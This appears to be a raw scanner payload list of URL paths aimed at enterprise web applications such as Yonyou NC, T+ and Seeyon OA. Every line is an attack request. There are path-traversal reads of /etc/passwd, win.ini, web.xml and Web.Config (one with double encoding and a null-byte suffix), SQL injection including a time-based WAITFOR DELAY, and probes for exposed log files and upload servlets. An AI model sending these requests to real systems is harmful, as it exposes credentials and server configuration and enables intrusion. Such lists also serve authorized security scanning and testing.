/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
/service/~baseapp/UploadServlet
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))
/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../
/system/mediafile/templateOfTaohong_manager.jsp?path=/../../
/system/mediafile/templateOfTaohong_manager.jsp?path=/../
/system/mediafile/templateOfTaohong_manager.jsp?path=/
/jsp/wsncapplet.jsp
/listSelectDialogServlet?slType=slFZX&slCdtn=1=2;WAITFOR+DELAY+%270:0:6%27--
/logs/debug.log
/logs/info.log
/logs/error.log
/ma/emp/maEmp/download?fileName=../../../../etc/passwd
/bg/attach/FileDownload?execlPath=C://Windows//win.ini
/portal/pt/downCourseWare/download?fileName=../webapps/nc_web/WEB-INF/web.xml&pageId=login
/portal/pt/printpdf/printBill?pageId=login&filePath=../../startup.bat
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{num}}))
/portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml
/iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js
